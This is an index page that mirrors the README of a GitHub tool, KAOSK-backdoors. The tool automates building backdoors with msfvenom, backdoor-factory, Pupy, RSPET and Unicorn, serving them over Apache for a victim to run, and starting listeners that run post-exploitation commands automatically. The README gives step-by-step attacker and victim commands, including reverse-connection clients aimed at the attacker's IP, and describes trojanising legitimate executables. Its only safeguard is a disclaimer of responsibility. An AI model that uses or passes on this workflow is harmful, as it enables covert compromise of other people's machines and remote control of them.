Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/carlospolop/kaosk-backdoors

Automate the creation of Backdoors and postexplotation activities
https://github.com/carlospolop/kaosk-backdoors

attacker backdoors backdoors-created listener metasploit metasploit-payloads msfvenom postexplotation unicorn

Last synced: 11 days ago
JSON representation

Automate the creation of Backdoors and postexplotation activities

Host: GitHub
URL: https://github.com/carlospolop/kaosk-backdoors
Owner: carlospolop
Created: 2017-01-13T12:05:31.000Z (almost 8 years ago)
Default Branch: master
Last Pushed: 2022-06-20T06:08:49.000Z (over 2 years ago)
Last Synced: 2024-05-02T01:09:46.518Z (6 months ago)
Topics: attacker, backdoors, backdoors-created, listener, metasploit, metasploit-payloads, msfvenom, postexplotation, unicorn
Language: Python
Homepage:
Size: 3.58 MB
Stars: 23
Watchers: 4
Forks: 20
Open Issues: 1
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# KAOSK-Backdoors

It's a tool that automates:
+ The installation of some Backdoor's creation programs
+ The creation of the backdoors to use in a victim machine
+ Start running an Apache where you can download the backdoors created
+ The starting of he listener of the backdoors downloaded
+ The actions to execute when a victim if connected to the listener

## Example
Using Kali2 as the attacker with IP: 192.168.0.100

Using any machine as the victim in the same network as the attacker.

Run in Kali:
```bash
git clone https://github.com/carlospolop/KAOSK-backdoors.git
cd ./KAOSK-backdoors
python ./install.py
python ./create_backdoors.py 192.168.0.100
python ./handler.py 192.168.0.100
```
In the victim machine:

Use a browser and navigate to 192.168.0.100/back and you will see the backdoors created before in the attacker machine.
Download the backdoor that you want to use.

Run the backdoor downloaded in the victim machine.

You will have a session of the victim's machine in Kali.

If you had chosen a backdoor created using msfvenom, backdoor-factory or unicorn, you will have a metasploit session of the victim. The metasploit's sessions can be configured to automatically run post modules, meterpreter commands and shell commands in the config folder. This means that when you capture a metasploit sessions this modules and commands will run automatically.

## Configure which metasploit payloads to use
You can select which metasploit payloads to use in the document called payloads.txt in the config folder.

Te sintax is: PAYLOAD PORT

## Configure which post modules, meterpreter commands and shell commands automatically run
You just have to go to the config folder and there you will find some folders of differents OS. Go inside anyone and you will find some text documents where you can write which post modules, meterpreters commands and shell commands run when you capture a session in a machine that uses the OS selected.

## Requirements
+ Python
+ Metasploit
+ Backdoor-factory
+ Apache2

KAOSK has been tested in Kali2.

## Install
`python ./install.py`

## Create the Backdoors
`python ./create_backdoors.py IP_attacker`

## Start handler
`python ./handler.py IP_attacker`

# Backdoors created
## Backdoors used:
+ Backdoor-factoy
+ MiaoMiao
+ Msfvenom
+ Pupy
+ RSPET
+ Unicorn

## Backdoor-factory
The backdoor-factory introduces the backdoors inside executables.

If you want to corrupt a executable, you just have to download the original, move it to the correct folder inside ./BDF_prepared and run python ./create_backdoors.py IP_attacker (or python ./backdoor-factoryAuto.py IP_attacker)

https://github.com/secretsquirrel/the-backdoor-factory.git

## MiaoMiao
This backdoor opens a port in the victims machine and the attacker connects to it. The default port is 55555
To use this backdoor you have to run:
+ Victim: Run MiaoMiamo_folder/src_backdoor/server_dist/newest_version
+ Attacker: nc IP_Victim 55555 -vv

https://github.com/marc0l92/MiaoMiao_project.git

## Msfvenom
Of course.

## Pupy
Creates differents types of backdoors and use it's own listener. It is all automated and the process followed to use these backdoors is:
+ Victim: Run the file create using ./pupygen.py -f lin_x64 connect --host IP_Attacker
+ Attacker: ./pupysh.py

https://github.com/n1nj4sec/pupy.git

## RSPET
To use this backdoor you have to run:
+ Victim: Run python RSPET_folder/Client/rspet_client.py IP_Attacker
+ Attacker: (This part is automated) Run Server > rspet_server.py

https://github.com/panagiks/RSPET.git

## Unicorn
Creates differents types of backdoors and it is all automated.
Uses metasploit as listener.

https://github.com/n1nj4sec/pupy.git

## Conditions
The owner of this software made it with educational and didactic purposes and is not responsable of the use of it.